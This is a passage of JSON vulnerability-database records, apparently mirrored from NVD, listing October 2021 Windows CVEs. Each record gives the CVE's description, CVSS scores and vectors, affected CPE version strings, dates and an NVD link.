"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:16:53", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41342", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41342"], "modified": "2021-10-19T17:19:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-41342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41342", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:16:47", "description": "Windows Media Audio Decoder Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41331", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41331"], "modified": "2021-10-19T16:12:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-41331", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41331", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:16", "description": "Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40460", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40460"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-40460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40460", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-05-23T19:14:25", "description": "Windows exFAT File System Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-38663", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38663"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-38663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38663", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:16:53", "description": "Windows Graphics Component Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41340", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41340"], "modified": "2021-10-19T17:17:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41340", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:10", "description": "Windows Text Shaping Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40465", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40465"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:*", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_7:sp1"], "id": "CVE-2021-40465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:*:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:sp1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:*:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:sp1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-05-04T15:43:44", "description": "Windows HTTP.sys Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-26442", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26442"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", 